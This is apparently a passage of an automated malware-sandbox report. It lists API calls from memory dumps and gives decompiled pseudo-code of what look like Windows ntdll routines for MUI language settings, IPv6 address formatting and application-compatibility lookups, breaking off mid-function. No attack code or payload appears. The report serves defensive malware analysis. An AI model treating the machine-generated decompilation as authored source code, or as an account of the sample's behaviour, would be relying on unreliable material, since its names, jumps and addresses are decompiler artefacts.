                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 2422867632-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFA2,000CCFA2,?,00000000,?,?), ref: 000D8660
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CCFA2,000CCFA2,?,00000000,?,?), ref: 000D8660
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LookupPrivilegeValue
                                                                                        • String ID:
                                                                                        • API String ID: 3899507212-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,000C7C63,?), ref: 000CD43B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00008003,?,?,000C7C63,?), ref: 000CD43B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687415275.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        C-Code - Quality: 94%
                                                                                        			E01F68788(signed int __ecx, void* __edx, signed int _a4) {
                                                                                        				signed int _v8;
                                                                                        				short* _v12;
                                                                                        				void* _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				signed int _v28;
                                                                                        				signed int _v32;
                                                                                        				char _v36;
                                                                                        				signed int _v40;
                                                                                        				char _v44;
                                                                                        				signed int _v48;
                                                                                        				signed int _v52;
                                                                                        				signed int _v56;
                                                                                        				signed int _v60;
                                                                                        				char _v68;
                                                                                        				void* _t216;
                                                                                        				intOrPtr _t231;
                                                                                        				short* _t235;
                                                                                        				intOrPtr _t257;
                                                                                        				short* _t261;
                                                                                        				intOrPtr _t284;
                                                                                        				intOrPtr _t288;
                                                                                        				void* _t314;
                                                                                        				signed int _t318;
                                                                                        				short* _t319;
                                                                                        				intOrPtr _t321;
                                                                                        				void* _t328;
                                                                                        				void* _t329;
                                                                                        				char* _t332;
                                                                                        				signed int _t333;
                                                                                        				signed int* _t334;
                                                                                        				void* _t335;
                                                                                        				void* _t338;
                                                                                        				void* _t339;
                                                                                        
                                                                                        				_t328 = __edx;
                                                                                        				_t322 = __ecx;
                                                                                        				_t318 = 0;
                                                                                        				_t334 = _a4;
                                                                                        				_v8 = 0;
                                                                                        				_v28 = 0;
                                                                                        				_v48 = 0;
                                                                                        				_v20 = 0;
                                                                                        				_v40 = 0;
                                                                                        				_v32 = 0;
                                                                                        				_v52 = 0;
                                                                                        				if(_t334 == 0) {
                                                                                        					_t329 = 0xc000000d;
                                                                                        					L49:
                                                                                        					_t334[0x11] = _v56;
                                                                                        					 *_t334 =  *_t334 | 0x00000800;
                                                                                        					_t334[0x12] = _v60;
                                                                                        					_t334[0x13] = _v28;
                                                                                        					_t334[0x17] = _v20;
                                                                                        					_t334[0x16] = _v48;
                                                                                        					_t334[0x18] = _v40;
                                                                                        					_t334[0x14] = _v32;
                                                                                        					_t334[0x15] = _v52;
                                                                                        					return _t329;
                                                                                        				}
                                                                                        				_v56 = 0;
                                                                                        				if(E01F68460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                        					_v56 = 1;
                                                                                        					if(_v8 != 0) {
                                                                                        						_t207 = E01F4E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                        					}
                                                                                        					_push(1);
                                                                                        					_v8 = _t318;
                                                                                        					E01F6718A(_t207);
                                                                                        					_t335 = _t335 + 4;
                                                                                        				}
                                                                                        				_v60 = _v60 | 0xffffffff;
                                                                                        				if(E01F68460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                                                        					_t333 =  *_v8;
                                                                                        					_v60 = _t333;
                                                                                        					_t314 = E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        					_push(_t333);
                                                                                        					_v8 = _t318;
                                                                                        					E01F6718A(_t314);
                                                                                        					_t335 = _t335 + 4;
                                                                                        				}
                                                                                        				_t216 = E01F68460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                                                        				_t332 = ";";
                                                                                        				if(_t216 < 0) {
                                                                                        					L17:
                                                                                        					if(E01F68460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                        						L30:
                                                                                        						if(E01F68460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                                                        							L46:
                                                                                        							_t329 = 0;
                                                                                        							L47:
                                                                                        							if(_v8 != _t318) {
                                                                                        								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        							}
                                                                                        							if(_v28 != _t318) {
                                                                                        								if(_v20 != _t318) {
                                                                                        									E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                        									_v20 = _t318;
                                                                                        									_v40 = _t318;
                                                                                        								}
                                                                                        							}
                                                                                        							goto L49;
                                                                                        						}
                                                                                        						_t231 = _v24;
                                                                                        						_t322 = _t231 + 4;
                                                                                        						_push(_t231);
                                                                                        						_v52 = _t322;
                                                                                        						E01F6718A(_t231);
                                                                                        						if(_t322 == _t318) {
                                                                                        							_v32 = _t318;
                                                                                        						} else {
                                                                                        							_v32 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        						}
                                                                                        						if(_v32 == _t318) {
                                                                                        							_v52 = _t318;
                                                                                        							L58:
                                                                                        							_t329 = 0xc0000017;
                                                                                        							goto L47;
                                                                                        						} else {
                                                                                        							E01F42340(_v32, _v8, _v24);
                                                                                        							_v16 = _v32;
                                                                                        							_a4 = _t318;
                                                                                        							_t235 = E01F5E679(_v32, _t332);
                                                                                        							while(1) {
                                                                                        								_t319 = _t235;
                                                                                        								if(_t319 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								 *_t319 = 0;
                                                                                        								_t321 = _t319 + 2;
                                                                                        								E01F4E2A8(_t322,  &_v68, _v16);
                                                                                        								if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        									_a4 = _a4 + 1;
                                                                                        								}
                                                                                        								_v16 = _t321;
                                                                                        								_t235 = E01F5E679(_t321, _t332);
                                                                                        								_pop(_t322);
                                                                                        							}
                                                                                        							_t236 = _v16;
                                                                                        							if( *_v16 != _t319) {
                                                                                        								E01F4E2A8(_t322,  &_v68, _t236);
                                                                                        								if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        									_a4 = _a4 + 1;
                                                                                        								}
                                                                                        							}
                                                                                        							if(_a4 == 0) {
                                                                                        								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                                                        								_v52 = _v52 & 0x00000000;
                                                                                        								_v32 = _v32 & 0x00000000;
                                                                                        							}
                                                                                        							if(_v8 != 0) {
                                                                                        								E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                                                        							}
                                                                                        							_v8 = _v8 & 0x00000000;
                                                                                        							_t318 = 0;
                                                                                        							goto L46;
                                                                                        						}
                                                                                        					}
                                                                                        					_t257 = _v24;
                                                                                        					_t322 = _t257 + 4;
                                                                                        					_push(_t257);
                                                                                        					_v40 = _t322;
                                                                                        					E01F6718A(_t257);
                                                                                        					_t338 = _t335 + 4;
                                                                                        					if(_t322 == _t318) {
                                                                                        						_v20 = _t318;
                                                                                        					} else {
                                                                                        						_v20 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        					}
                                                                                        					if(_v20 == _t318) {
                                                                                        						_v40 = _t318;
                                                                                        						goto L58;
                                                                                        					} else {
                                                                                        						E01F42340(_v20, _v8, _v24);
                                                                                        						_v16 = _v20;
                                                                                        						_a4 = _t318;
                                                                                        						_t261 = E01F5E679(_v20, _t332);
                                                                                        						_t335 = _t338 + 0x14;
                                                                                        						while(1) {
                                                                                        							_v12 = _t261;
                                                                                        							if(_t261 == _t318) {
                                                                                        								break;
                                                                                        							}
                                                                                        							_v12 = _v12 + 2;
                                                                                        							 *_v12 = 0;
                                                                                        							E01F4E2A8(_v12,  &_v68, _v16);
                                                                                        							if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        								_a4 = _a4 + 1;
                                                                                        							}
                                                                                        							_v16 = _v12;
                                                                                        							_t261 = E01F5E679(_v12, _t332);
                                                                                        							_pop(_t322);
                                                                                        						}
                                                                                        						_t269 = _v16;
                                                                                        						if( *_v16 != _t318) {
                                                                                        							E01F4E2A8(_t322,  &_v68, _t269);
                                                                                        							if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        								_a4 = _a4 + 1;
                                                                                        							}
                                                                                        						}
                                                                                        						if(_a4 == _t318) {
                                                                                        							E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                        							_v40 = _t318;
                                                                                        							_v20 = _t318;
                                                                                        						}
                                                                                        						if(_v8 != _t318) {
                                                                                        							E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        						}
                                                                                        						_v8 = _t318;
                                                                                        						goto L30;
                                                                                        					}
                                                                                        				}
                                                                                        				_t284 = _v24;
                                                                                        				_t322 = _t284 + 4;
                                                                                        				_push(_t284);
                                                                                        				_v48 = _t322;
                                                                                        				E01F6718A(_t284);
                                                                                        				_t339 = _t335 + 4;
                                                                                        				if(_t322 == _t318) {
                                                                                        					_v28 = _t318;
                                                                                        				} else {
                                                                                        					_v28 = E01F4E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                        				}
                                                                                        				if(_v28 == _t318) {
                                                                                        					_v48 = _t318;
                                                                                        					goto L58;
                                                                                        				} else {
                                                                                        					E01F42340(_v28, _v8, _v24);
                                                                                        					_v16 = _v28;
                                                                                        					_a4 = _t318;
                                                                                        					_t288 = E01F5E679(_v28, _t332);
                                                                                        					_t335 = _t339 + 0x14;
                                                                                        					while(1) {
                                                                                        						_v12 = _t288;
                                                                                        						if(_t288 == _t318) {
                                                                                        							break;
                                                                                        						}
                                                                                        						_v12 = _v12 + 2;
                                                                                        						 *_v12 = 0;
                                                                                        						E01F4E2A8(_v12,  &_v68, _v16);
                                                                                        						if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        							_a4 = _a4 + 1;
                                                                                        						}
                                                                                        						_v16 = _v12;
                                                                                        						_t288 = E01F5E679(_v12, _t332);
                                                                                        						_pop(_t322);
                                                                                        					}
                                                                                        					_t296 = _v16;
                                                                                        					if( *_v16 != _t318) {
                                                                                        						E01F4E2A8(_t322,  &_v68, _t296);
                                                                                        						if(E01F65553(_t328,  &_v68,  &_v36) != 0) {
                                                                                        							_a4 = _a4 + 1;
                                                                                        						}
                                                                                        					}
                                                                                        					if(_a4 == _t318) {
                                                                                        						E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                        						_v48 = _t318;
                                                                                        						_v28 = _t318;
                                                                                        					}
                                                                                        					if(_v8 != _t318) {
                                                                                        						E01F4E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                        					}
                                                                                        					_v8 = _t318;
                                                                                        					goto L17;
                                                                                        				}
                                                                                        			}





































                                                                                        0x01f689b6
                                                                                        0x01f689c8
                                                                                        0x01f689cd
                                                                                        0x01f689d0
                                                                                        0x01f689d0
                                                                                        0x01f689d6
                                                                                        0x01f689e8
                                                                                        0x01f689e8
                                                                                        0x01f689ed
                                                                                        0x00000000
                                                                                        0x01f689ed
                                                                                        0x01f6895a
                                                                                        0x01f6883e
                                                                                        0x01f68841
                                                                                        0x01f68844
                                                                                        0x01f68845
                                                                                        0x01f68848
                                                                                        0x01f6884d
                                                                                        0x01f68852
                                                                                        0x01f68b49
                                                                                        0x01f68858
                                                                                        0x01f6886c
                                                                                        0x01f6886c
                                                                                        0x01f68872
                                                                                        0x01fb1b0e
                                                                                        0x00000000
                                                                                        0x01f68878
                                                                                        0x01f68881
                                                                                        0x01f6888b
                                                                                        0x01f6888e
                                                                                        0x01f68891
                                                                                        0x01f68896
                                                                                        0x01f68899
                                                                                        0x01f68899
                                                                                        0x01f6889e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01fb1b21
                                                                                        0x01fb1b27
                                                                                        0x01fb1b2e
                                                                                        0x01fb1b42
                                                                                        0x01fb1b44
                                                                                        0x01fb1b44
                                                                                        0x01fb1b4c
                                                                                        0x01fb1b4f
                                                                                        0x01fb1b55
                                                                                        0x01fb1b55
                                                                                        0x01f688a4
                                                                                        0x01f688aa
                                                                                        0x01f688b1
                                                                                        0x01f688c5
                                                                                        0x01fb1b5b
                                                                                        0x01fb1b5b
                                                                                        0x01f688c5
                                                                                        0x01f688ce
                                                                                        0x01f688e0
                                                                                        0x01f688e5
                                                                                        0x01f688e8
                                                                                        0x01f688e8
                                                                                        0x01f688ee
                                                                                        0x01f68900
                                                                                        0x01f68900
                                                                                        0x01f68905
                                                                                        0x00000000
                                                                                        0x01f68905

                                                                                        APIs
                                                                                        Strings
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01F687E6
                                                                                        • WindowsExcludedProcs, xrefs: 01F687C1
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 01F68827
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 01F689FC
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01F68914
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: _wcspbrk
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 402402107-258546922
                                                                                        • Opcode ID: c81bc30f0ada6817cdc5d5bbec17627a8f553532efa07266f798021b9359fffe
                                                                                        • Instruction ID: 67bdbf1e80b046df04489fd462e83554ca14b2317006a8bbff994e3c4997e93d
                                                                                        • Opcode Fuzzy Hash: c81bc30f0ada6817cdc5d5bbec17627a8f553532efa07266f798021b9359fffe
                                                                                        • Instruction Fuzzy Hash: ECF1E7B2D0020AEFDF11DF99CD809EEBBB9FF18344F14446AE605A7211E7369A45DB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 38%
                                                                                        			E01F813CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                        				char _v8;
                                                                                        				intOrPtr _v12;
                                                                                        				intOrPtr* _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				char _v24;
                                                                                        				intOrPtr _t71;
                                                                                        				signed int _t78;
                                                                                        				signed int _t86;
                                                                                        				char _t90;
                                                                                        				signed int _t91;
                                                                                        				signed int _t96;
                                                                                        				intOrPtr _t108;
                                                                                        				signed int _t114;
                                                                                        				void* _t115;
                                                                                        				intOrPtr _t128;
                                                                                        				intOrPtr* _t129;
                                                                                        				void* _t130;
                                                                                        
                                                                                        				_t129 = _a4;
                                                                                        				_t128 = _a8;
                                                                                        				_t116 = 0;
                                                                                        				_t71 = _t128 + 0x5c;
                                                                                        				_v8 = 8;
                                                                                        				_v20 = _t71;
                                                                                        				if( *_t129 == 0) {
                                                                                        					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                        						goto L5;
                                                                                        					} else {
                                                                                        						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                        						if(_t96 != 0) {
                                                                                        							L38:
                                                                                        							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                        								goto L5;
                                                                                        							} else {
                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        								_t86 = E01F77707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                        								L36:
                                                                                        								return _t128 + _t86 * 2;
                                                                                        							}
                                                                                        						}
                                                                                        						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                        						if(_t114 == 0) {
                                                                                        							L33:
                                                                                        							_t115 = 0x1f42926;
                                                                                        							L35:
                                                                                        							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                        							_t86 = E01F77707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                        							goto L36;
                                                                                        						}
                                                                                        						if(_t114 != 0xffff) {
                                                                                        							_t116 = 0;
                                                                                        							goto L38;
                                                                                        						}
                                                                                        						if(_t114 != 0) {
                                                                                        							_t115 = 0x1f49cac;
                                                                                        							goto L35;
                                                                                        						}
                                                                                        						goto L33;
                                                                                        					}
                                                                                        				} else {
                                                                                        					L5:
                                                                                        					_a8 = _t116;
                                                                                        					_a4 = _t116;
                                                                                        					_v12 = _t116;
                                                                                        					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                        						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                        							_v8 = 6;
                                                                                        						}
                                                                                        					}
                                                                                        					_t90 = _v8;
                                                                                        					if(_t90 <= _t116) {
                                                                                        						L11:
                                                                                        						if(_a8 - _a4 <= 1) {
                                                                                        							_a8 = _t116;
                                                                                        							_a4 = _t116;
                                                                                        						}
                                                                                        						_t91 = 0;
                                                                                        						if(_v8 <= _t116) {
                                                                                        							L22:
                                                                                        							if(_v8 < 8) {
                                                                                        								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                        								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                        								_t128 = _t128 + E01F77707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                        							}
                                                                                        							return _t128;
                                                                                        						} else {
                                                                                        							L14:
                                                                                        							L14:
                                                                                        							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                        								if(_t91 != _t116 && _t91 != _a8) {
                                                                                        									_push(":");
                                                                                        									_push(_t71 - _t128 >> 1);
                                                                                        									_push(_t128);
                                                                                        									_t128 = _t128 + E01F77707() * 2;
                                                                                        									_t71 = _v20;
                                                                                        									_t130 = _t130 + 0xc;
                                                                                        								}
                                                                                        								_t78 = E01F77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                        								_t130 = _t130 + 0x10;
                                                                                        							} else {
                                                                                        								_push(L"::");
                                                                                        								_push(_t71 - _t128 >> 1);
                                                                                        								_push(_t128);
                                                                                        								_t78 = E01F77707();
                                                                                        								_t130 = _t130 + 0xc;
                                                                                        								_t91 = _a8 - 1;
                                                                                        							}
                                                                                        							_t91 = _t91 + 1;
                                                                                        							_t128 = _t128 + _t78 * 2;
                                                                                        							_t71 = _v20;
                                                                                        							if(_t91 >= _v8) {
                                                                                        								goto L22;
                                                                                        							}
                                                                                        							_t116 = 0;
                                                                                        							goto L14;
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t108 = 1;
                                                                                        						_v16 = _t129;
                                                                                        						_v24 = _t90;
                                                                                        						do {
                                                                                        							if( *_v16 == _t116) {
                                                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                                                        									_a4 = _v12;
                                                                                        									_a8 = _t108;
                                                                                        								}
                                                                                        								_t116 = 0;
                                                                                        							} else {
                                                                                        								_v12 = _t108;
                                                                                        							}
                                                                                        							_v16 = _v16 + 2;
                                                                                        							_t108 = _t108 + 1;
                                                                                        							_t26 =  &_v24;
                                                                                        							 *_t26 = _v24 - 1;
                                                                                        						} while ( *_t26 != 0);
                                                                                        						goto L11;
                                                                                        					}
                                                                                        				}
                                                                                        			}




















                                                                                        0x01fae9cc
                                                                                        0x01fae9d2
                                                                                        0x01fae9d2
                                                                                        0x01fae9cc
                                                                                        0x01f8140c
                                                                                        0x01f81411
                                                                                        0x01f81431
                                                                                        0x01f8143a
                                                                                        0x01f8143c
                                                                                        0x01f8143f
                                                                                        0x01f8143f
                                                                                        0x01f81442
                                                                                        0x01f81447
                                                                                        0x01f814a8
                                                                                        0x01f814ac
                                                                                        0x01fae9e2
                                                                                        0x01fae9e7
                                                                                        0x01fae9ec
                                                                                        0x01faea05
                                                                                        0x01faea05
                                                                                        0x00000000
                                                                                        0x01f81449
                                                                                        0x00000000
                                                                                        0x01f81449
                                                                                        0x01f8144c
                                                                                        0x01f81459
                                                                                        0x01f81462
                                                                                        0x01f81469
                                                                                        0x01f8146a
                                                                                        0x01f81470
                                                                                        0x01f81473
                                                                                        0x01f81476
                                                                                        0x01f81476
                                                                                        0x01f81490
                                                                                        0x01f81495
                                                                                        0x01f8138e
                                                                                        0x01f81390
                                                                                        0x01f81397
                                                                                        0x01f81398
                                                                                        0x01f81399
                                                                                        0x01f813a1
                                                                                        0x01f813a4
                                                                                        0x01f813a4
                                                                                        0x01f81498
                                                                                        0x01f8149c
                                                                                        0x01f8149f
                                                                                        0x01f814a2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01f814a4
                                                                                        0x00000000
                                                                                        0x01f814a4
                                                                                        0x01f81413
                                                                                        0x01f81415
                                                                                        0x01f81416
                                                                                        0x01f81419
                                                                                        0x01f8141c
                                                                                        0x01f81422
                                                                                        0x01f813b7
                                                                                        0x01f813bc
                                                                                        0x01f813bf
                                                                                        0x01f813bf
                                                                                        0x01f813c2
                                                                                        0x01f81424
                                                                                        0x01f81424
                                                                                        0x01f81424
                                                                                        0x01f81427
                                                                                        0x01f8142b
                                                                                        0x01f8142c
                                                                                        0x01f8142c
                                                                                        0x01f8142c
                                                                                        0x00000000
                                                                                        0x01f8141c
                                                                                        0x01f81411

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.687936903.0000000001F30000.00000040.00000001.sdmp, Offset: 01F20000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.687929092.0000000001F20000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688040824.0000000002010000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688050303.0000000002020000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688061224.0000000002024000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688071309.0000000002027000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688079791.0000000002030000.00000040.00000001.sdmp
                                                                                        • Associated: 0000000B.00000002.688127742.0000000002090000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: ___swprintf_l
                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                        • API String ID: 48624451-2108815105
                                                                                        • Opcode ID: 0ff3115a12d325e864d7f4261249c3b604c004abbc427fe92410231ec39111e2
                                                                                        • Instruction ID: d3da550bad9d99ccf33e80d507aba3b06be113067fde71e735d35340768419fd
                                                                                        • Opcode Fuzzy Hash: 0ff3115a12d325e864d7f4261249c3b604c004abbc427fe92410231ec39111e2
                                                                                        • Instruction Fuzzy Hash: 616155B1E04616EACB24EF5DC8908BFBBB5EF99300754C22EE5D647541D236A641CB60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 64%
                                                                                        			E01F77EFD(void* __ecx, intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				char _v540;
                                                                                        				unsigned int _v544;
                                                                                        				signed int _v548;
                                                                                        				intOrPtr _v552;
                                                                                        				char _v556;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				signed int _t33;
                                                                                        				void* _t38;
                                                                                        				unsigned int _t46;
                                                                                        				unsigned int _t47;
                                                                                        				unsigned int _t52;
                                                                                        				intOrPtr _t56;
                                                                                        				unsigned int _t62;
                                                                                        				void* _t69;
                                                                                        				void* _t70;
                                                                                        				intOrPtr _t72;
                                                                                        				signed int _t73;
                                                                                        				void* _t74;
                                                                                        				void* _t75;
                                                                                        				void* _t76;
                                                                                        				void* _t77;
                                                                                        
                                                                                        				_t33 =  *0x2022088; // 0x76801594
                                                                                        				_v8 = _t33 ^ _t73;
                                                                                        				_v548 = _v548 & 0x00000000;
                                                                                        				_t72 = _a4;
                                                                                        				if(E01F77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                        					__eflags = _v548;
                                                                                        					if(_v548 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_t62 = _t72 + 0x24;
                                                                                        					E01F93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                                                        					_t71 = 0x214;
                                                                                        					_v544 = 0x214;
                                                                                        					E01F4DFC0( &_v540, 0, 0x214);
                                                                                        					_t75 = _t74 + 0x20;
                                                                                        					_t46 =  *0x2024218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                                                        					__eflags = _t46;
                                                                                        					if(_t46 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_t47 = _v544;
                                                                                        					__eflags = _t47;
                                                                                        					if(_t47 == 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					__eflags = _t47 - 0x214;
                                                                                        					if(_t47 >= 0x214) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					_push(_t62);
                                                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                                                        					E01F93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                                                        					_t52 = E01F50D27( &_v540, L"Execute=1");
                                                                                        					_t76 = _t75 + 0x1c;
                                                                                        					_push(_t62);
                                                                                        					__eflags = _t52;
                                                                                        					if(_t52 == 0) {
                                                                                        						E01F93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                                                        						_t71 =  &_v540;
                                                                                        						_t56 = _t73 + _v544 - 0x218;
                                                                                        						_t77 = _t76 + 0x14;
                                                                                        						_v552 = _t56;
                                                                                        						__eflags = _t71 - _t56;
                                                                                        						if(_t71 >= _t56) {
                                                                                        							goto L1;
                                                                                        						} else {
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						while(1) {
                                                                                        							L10:
